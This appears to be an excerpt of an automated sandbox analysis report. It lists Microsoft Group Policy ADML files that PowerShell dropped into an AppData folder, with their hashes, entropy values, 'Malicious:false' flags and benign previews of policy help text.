                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EE_EnablePersistentTimeStamp">Enable Persistent Time Stamp</string>.. <string id="EE_EnablePersistentTimeStamp_Help">This policy setting allows the system to detect the time of unexpected shutdowns by writing the current time to disk on a schedule controlled by the Timestamp Interval.....If you enable this policy setting, you are able to specify how often the Persistent System Timestamp is refreshed and subsequently written to the disk. You can specify the Timestamp Interval in seconds.....If you disable this

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\RemoteAssistance.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (455), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10373
                                                                                                                                                                                                        Entropy (8bit):4.861749081876546
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:E2YJPhavu9rf+gZnyy8uI30F3GF3QRcb4vervzv6lQ4:Nfu9rf+CZ8uI30F3GF3QRcbSebjqQ4
                                                                                                                                                                                                        MD5:F239E9C6B37ABE7AEE14C64FCD64D86A
                                                                                                                                                                                                        SHA1:D703C2A53723A2F933DE2456E706154A29194247
                                                                                                                                                                                                        SHA-256:428CCC88349680A1684A33176FED4E4B8BC544EC7B29DCD71CB17BFFE274D16F
                                                                                                                                                                                                        SHA-512:8221ABD08D82C27C4AAE3136E8E085C56BF8FF3D4059583F744C5837C61AAD0832D9AE5E84EF77780890A01684EB4F5D5CA33A7E35986435F771FDB67F66D11F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RA_Logging">Turn on session logging</string>.. <string id="RA_Logging_Help">This policy setting allows you to turn logging on or off. Log files are located in the user's Documents folder under Remote Assistance.....If you enable this policy setting, log files are generated.....If you disable this policy setting, log files are not generated.....If you do not configure this setting, application-based settings are used.</string>.. <string id="RA_Optimize_Bandwidth">Turn on bandwidth optimization</string>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\RemovableStorage.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (302), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13642
                                                                                                                                                                                                        Entropy (8bit):4.756771021239847
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EnzGj8hc8ROewd8BWwfZ6P0OuI3CDzGvnt7fdXV/gBLtDNGaUgmGaUTGaUFmGaU6:NtjIvGaUBGaUTGaUEGaUUGaUW
                                                                                                                                                                                                        MD5:3C7C9203B770747E42F16415384ACA91
                                                                                                                                                                                                        SHA1:577E03EBA471F120DB1A1D96648E18E215C57982
                                                                                                                                                                                                        SHA-256:61727D2632E0E816A562C6489E5732206A94D3F3581D35042F72FC03A7ECD3D0
                                                                                                                                                                                                        SHA-512:7C3F140959497EC753935942A4CB063BA3D431D1F5C4A6FA16BEBD065DE5280C9C0AC34E2A938E413CC7B68A78D2C33BE73DE58F74B1BD71A4A8DBDD12ABF080
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AccessRights_RebootTime">Set time (in seconds) to force reboot</string>.. <string id="AccessRights_RebootTime_Help">This policy setting configures the amount of time (in seconds) that the operating system waits to reboot in order to enforce a change in access rights to removable storage devices.....If you enable this policy setting, you can set the number of seconds you want the system to wait until a reboot.....If you disable or do not configure this setting, the operating system does not force a reboot.....N

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Scripts.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (331), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12538
                                                                                                                                                                                                        Entropy (8bit):4.768527840947223
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:E4w/xBxQzr/8RRROAHPKc16VcDuJxR1Vi3ia67NitbK0pft+pw7TUlyUAGSJ:wnRRPgHkS9A9D1P
                                                                                                                                                                                                        MD5:6B1C987D0C322DD0DD627EC2020F90AC
                                                                                                                                                                                                        SHA1:C25254DCB050E342AB84633F084B9ABC06EF9239
                                                                                                                                                                                                        SHA-256:EBC840298B0A1FB37F1DB1DF288FC5FAEA981B2F8AE4BE9E0E07D11A1E9E0FB5
                                                                                                                                                                                                        SHA-512:915A3DB4C3C0572BE46009BA976FFB606FD304B5908207F288C06DFA6A2281153304E7FF368E446BB8CE5217E0DB4FF849DD2119904007057D85ADEBB9B75325
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MaxGPOScriptWaitPolicy">Specify maximum wait time for Group Policy scripts</string>.. <string id="MaxGPOScriptWaitPolicy_Help">This policy setting determines how long the system waits for scripts applied by Group Policy to run. ....This setting limits the total time allowed for all logon, logoff, startup, and shutdown scripts applied by Group Policy to finish running. If the scripts have not finished running when the specified time expires, the system stops script processing and records an error event.....If y

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Securitycenter.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (622), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2466
                                                                                                                                                                                                        Entropy (8bit):4.781426635707619
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKBtxHxPUNbhQaB6+J5KaeKUYF1vKUYox2P1C9L5GkMo/2VcSurcFV:LeD5pmdtxHxG64MYfYo8NQL8IGrccFV
                                                                                                                                                                                                        MD5:BB7C4CF9B3DDFEFAE5FF4C38B5026EB3
                                                                                                                                                                                                        SHA1:157C536B83CB87B194C8BF8018A965EF72DC314B
                                                                                                                                                                                                        SHA-256:F49034EF8C96F7E5A19AFB7873AFB1A3F289630390E36C163B12FD2DDC15637A
                                                                                                                                                                                                        SHA-512:DE9E2E1824A0B9B03AFC476090D361DD5808C6D0B6C8EB70C7DFC590D8B222C78D062CAB2580E8F74F243CD713EB268BFC72BE232698F15CA269EE007F6B41DE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SecurityCenter">Security Center</string>.. <string id="SecurityCenter_SecurityCenterInDomain">Turn on Security Center (Domain PCs only)</string>.. <string id="SecurityCenter_SecurityCenterInDomain_Help">This policy setting specifies whether Security Center is turned on or off for computers that are joined to an Active Directory domain. When Security Center is turned on, it monitors essential security settings and notifies the user when the computer might be at risk. The Security Center Control Panel categ

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Sensors.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2056
                                                                                                                                                                                                        Entropy (8bit):4.6874178503699655
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKcgWEhQnwgbc+ijJzo/DQxCGgbxCEinEqcN8gUOZFV:LeD5pmkRLRSo/k0V0EvN4CFV
                                                                                                                                                                                                        MD5:7CAFF134D90FB9D9BFFD1931A3B7A077
                                                                                                                                                                                                        SHA1:6C1305F61CF2978F73F3C8DF3FB7639BC3761863
                                                                                                                                                                                                        SHA-256:B102166CF6A473DCE4ADC301156086D0EBA710EFFFA1C4A569EA480994A7F5B4
                                                                                                                                                                                                        SHA-512:2D7427C5572797903A6539A872B9AF3062F23BDF24E3004EC61388D321ABBDCF1D063DB00F5703BDC708AA1AE1B5FCF3262F961C3E9CFBC44BFDE8C001A4583D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableSensors">Turn off sensors</string>.. <string id="DisableSensors_Explain">.. This policy setting turns off the sensor feature for this computer..... If you enable this policy setting, the sensor feature is turned off, and all programs on this computer cannot use the sensor feature..... If you disable or do not configure this policy setting, all programs on this computer can use the sensor feature... </string>.. <string id="DisableLocation">Turn off location</string>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ServerManager.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (387), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4955
                                                                                                                                                                                                        Entropy (8bit):4.805565480068189
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmHhpF4FGEkPDY1o1NucOc3EfqYz0LYS0zYS0jfBQ3V:E2hpi4rPE1o1NudbrUMqfBQF
                                                                                                                                                                                                        MD5:65C390CEDEDFD130518B61FA1235250A
                                                                                                                                                                                                        SHA1:6A55E7AC36FE463A16AF0BE1F7F8B5C1848C0D97
                                                                                                                                                                                                        SHA-256:E47082B33ACA0FB727E6486ECA05ED0F7E309923D214DF7D6D1E9E1BB6B58A93
                                                                                                                                                                                                        SHA-512:FAC7D91F8DAE73E2719FE7D9E8BDAE71A4B3DD4375943DA8F0B9992E4554E0E95A503BB5F5EEAC6E6475209F9051B343D2928D028A3355EA58F987DD76ADD03D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008OrWindowsServer2008R2Only">Windows Server 2008 and Windows Server 2008 R2 operating systems only</string>.. <string id="DoNotLaunchServerManager">Do not display Server Manager automatically at logon</string>.. <string id="DoNotLaunchServerManagerHelp">This policy setting allows you to turn off the automatic display of Server Manager at logon.....If you enable this policy setting, Server Manager is not displayed automatically when a user logs on to the server.....If you disable t

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Servicing.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (408), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2386
                                                                                                                                                                                                        Entropy (8bit):4.892231615075483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cs+D5p8lF9YGTBdVhcNZPhcNspL8K5pWNLcrdYAkWQ/tgiwavEARV:P+D5iF9YGTnVhcNhhcNspL8KiNFBWQ/P
                                                                                                                                                                                                        MD5:C16E4D55B366521038B07E5B2EAA4D1A
                                                                                                                                                                                                        SHA1:C8FA7021E315736D6ED23ACA59D8B0CC3460FDD2
                                                                                                                                                                                                        SHA-256:0FB29A9479B51033FDE4838E9E61D1D382B173EF4F43C00799EF97940F0E498C
                                                                                                                                                                                                        SHA-512:9DC2BFAAE5885EE74E4AB8C7E9D0B6557550F8E6315199F23006F202AA234244CA1802D2D289F95E3213CA577DBD14D7D086CED34BDE2349C127CB31141E2512
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Servicing Policies</displayName>.. <description>Windows Servicing Policies</description>.. <resources>.. <stringTable>.. <string id="CloudFulfillmentGPO">Specify settings for optional component installation and component repair</string>.. <string id="CloudFulfillmentGPOExplanation">..This policy setting specifies the network locations that will be used for the repair of operating system corruption and for enabling optional features that have had their payload files removed.....If you enable this policy setting and specify the new location, the files in that location will be used to repair operating system corruption and for enabling

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\SettingSync.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9740
                                                                                                                                                                                                        Entropy (8bit):4.723278539465857
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:PD5pmpC5ZTUe/5edwuTysvjk9yGfUqWxOV:ftHUwueIjkkGfnWw
                                                                                                                                                                                                        MD5:A46525DCC0BBEFF3717004AA7D5E686B
                                                                                                                                                                                                        SHA1:85429467F34FFB172D7E404E60542C50090C6AFE
                                                                                                                                                                                                        SHA-256:044A3C384EC4E46E9EE6AA4BF4D28F3027A758DE7A9163324FE80EE466E935E5
                                                                                                                                                                                                        SHA-512:551C90AD33D7ECBE6E0D45B1FF22ED092C239EFC63189D7D0E0FF1147E82C3694ECE958DF4DF5A89F87E4CE966284D9317CEE93D6F38B76152ED26A3D2DC54A0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. General -->.. <string id="SettingSyncCategory">Sync your settings</string>.... Main policy -->.. <string id="DisableSettingSync">Do not sync</string>.. <string id="DisableSettingSync_Help">Prevent syncing to and from this PC. This turns off and disables the "sync your settings" switch on the "sync your settings" page in PC Settings.....If you enable this policy setting, "sync your settings" will be turned off, and none of the "sync your setting" groups will be synced on this PC.....Use the option

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Setup.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                        Entropy (8bit):4.847450101986129
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ybvkTvKvkTlE6OmYyfbTebTlCa/Yi7R0ryMOVjoV:cgeD5x8gm8fKnxRRxYEbQRj/Yi7S0oV
                                                                                                                                                                                                        MD5:9940A876376DFACA4C22AEB49D5E98D1
                                                                                                                                                                                                        SHA1:4092EC36B7F64EB2D076D11F04AFBB38C95A9AEB
                                                                                                                                                                                                        SHA-256:F0AF5022E574F037FEFF288B1944788E08E9F1C3CC29E2968022B05EE8A12D71
                                                                                                                                                                                                        SHA-512:DE5BF65874ABDF5AF96EA22C5D97170AE5B3312B39A2FB3C19F1E33D0A7AC71F2633510E2CE1C87794FE818CD50DA4FB2D328E69C1E0005D9C8D86B96A88C1D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ServicePackSourcePath">Specify Windows Service Pack installation file location</string>.. <string id="ServicePackSourcePath_Help">Specifies an alternate location for Windows Service Pack installation files.....If you enable this policy setting, enter the fully qualified path to the new location in the "Windows Service Pack Setup file path" box.....If you disable or do not configure this policy setting, the Windows Service Pack Setup source path will be the location used during the last time Windows Service Pac

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\SharedFolders.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1850
                                                                                                                                                                                                        Entropy (8bit):4.859149246040625
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKgJxujBDrfS1Z/yqqqYu5BV5ocfS1Z/MFV:LeD5pmCeKV4JcKVMFV
                                                                                                                                                                                                        MD5:B512AC9CA34BC2605D206FA9D22778F1
                                                                                                                                                                                                        SHA1:21E31C62BA3B2E963A2A78B9490270D87E14F082
                                                                                                                                                                                                        SHA-256:3649D182A6D570C693D564E11B80127960E3F34BD98C2DABC5E5A1F640B7EACF
                                                                                                                                                                                                        SHA-512:2F726D9A4E067AC354A7C6E5EC36EC5973CD04731E4A14DF3DE30061447A077F38F8B4752112E0DB0BA3E1DACCB6A0C98F148F4FB00FCBEE07B6D6A7206020F0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PublishDfsRoots">Allow DFS roots to be published</string>.. <string id="PublishDfsRoots_Help">This policy setting determines whether the user can publish DFS roots in Active Directory Domain Services (AD DS).....If you enable or do not configure this policy setting, users can use the "Publish in Active Directory" option to publish DFS roots as shared folders in AD DS .....If you disable this policy setting, users cannot publish DFS roots in AD DS and the "Publish in Active Directory" option is disabled. Note:

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Sharing.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (372), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2463
                                                                                                                                                                                                        Entropy (8bit):4.766622027240466
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKMQ44nWQqxjgwrGOnLbvE4juaM8oFV:LeD5pmdpMGOnN6aM8oFV
                                                                                                                                                                                                        MD5:F76CBCDF77EAC5FEF366F9F9D45F5E76
                                                                                                                                                                                                        SHA1:89F54964A2B4E1DE63448AADFCC678470886DDAF
                                                                                                                                                                                                        SHA-256:56D6E0E7FD98836C698D345735B4F7633DF49C455500C41B20E7B5D6FDF40AB3
                                                                                                                                                                                                        SHA-512:D86BB5E1DA555D6F09FEA4E3C930AE560E777F64B0C38A225201CC401869A82A0A05A5C3E874310C1F4C0BA33F131B607CBA7DAB8BE61AC247F44CCB080401D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoInplaceSharing">Prevent users from sharing files within their profile.</string>.. <string id="NoInplaceSharing_Help">This policy setting specifies whether users can share files within their profile. By default users are allowed to share files within their profile to other users on their network after an administrator opts in the computer. An administrator can opt in the computer by using the sharing wizard to share a file within their profile.....If you enable this policy setting, users cannot share files w

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Shell-CommandPrompt-RegEditTools.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5239
                                                                                                                                                                                                        Entropy (8bit):4.777406183575808
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmrH1U680U30fNS57tc/Ja80+fgT9lsc/osa80+fVxV:EYU6xU3RtckQ0zscCQVT
                                                                                                                                                                                                        MD5:3925D35054AB425A8F3690C2FA33BDFC
                                                                                                                                                                                                        SHA1:A2DFC384B4F8351B40B9406A94ADEFB1B85F9C7B
                                                                                                                                                                                                        SHA-256:BEC7CF7EC0CDFD01BB8677C20C887988A642742F136C0437D49A67F218087842
                                                                                                                                                                                                        SHA-512:AE7CABBE1C4E7618E787F9D3BDB621CB32E99F5802114A20BCF6ADA2E7B52F7EE12556E8023B38142FF42EA580624DAB40D988B23AEE4BB4BB9E2A8905B175D1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableCMD">Prevent access to the command prompt</string>.. <string id="DisableCMD_Help">This policy setting prevents users from running the interactive command prompt, Cmd.exe. This policy setting also determines whether batch files (.cmd and .bat) can run on the computer.....If you enable this policy setting and the user tries to open a command window, the system displays a message explaining that a setting prevents the action.....If you disable this policy setting or do not configure it, users can run Cmd.

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ShellWelcomeCenter.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1034
                                                                                                                                                                                                        Entropy (8bit):4.934703334666594
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8Cnid3PRM5LDa3IQWFV:cgeD5x8gm8fK4IPRMNe3IQWFV
                                                                                                                                                                                                        MD5:E1C3A48A813C8E8D7F076966FFF1782F
                                                                                                                                                                                                        SHA1:E678B2457A0B3D7FA37C25899823E1DCBF335552
                                                                                                                                                                                                        SHA-256:778A48685463098ECBAB0E95EC4BA4CC299704453A10B790404D636C78495A6F
                                                                                                                                                                                                        SHA-512:E7B2002E5ABEDBC1C2E877143F6296A060FF2BE18CDF9743119F068CBA422A4D4B502E7E69DCABA5D1A5BBB20E42D9EA978479A3A996040E4F9CC5413F1E1F5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RestrictWelcomeCenter">Do not display the Welcome Center at user logon</string>.. <string id="RestrictWelcomeCenter_Help">This policy setting prevents the display of the Welcome Center at user logon.....If you enable this policy setting, the Welcome Center is not displayed at user logon. The user can access the Welcome Center using the Control Panel or Start menu.....If you disable or do not configure this policy setting, the Welcome Center is displayed at user logon.</string>.. </stringTable>.. </resource

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Sidebar.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2181
                                                                                                                                                                                                        Entropy (8bit):4.808024425882859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKv7uPPd4IaFpT6P0vQWjp3lFV:LeD5pm38BG56i1FV
                                                                                                                                                                                                        MD5:FF097ECD6B6D14BEEB70B111DEB1EE8C
                                                                                                                                                                                                        SHA1:2AE1D93696A7892254D05D9C73B21360B056EDAE
                                                                                                                                                                                                        SHA-256:70198BCD06B06CBBFBE1CCDDDC0815D3BB2239CAD51403E32340C20B892A06D9
                                                                                                                                                                                                        SHA-512:E1C41A1B9CC3CE9987CFA52447A24CCEA55CE38F4F09AAC5071365CF206D28D94F7C4CE77B3B693D019084DA2BD5F9646EEB287BA8C4CBDADB06C6614EF87F03
                                                                                                                                                                                                        Malicious:false
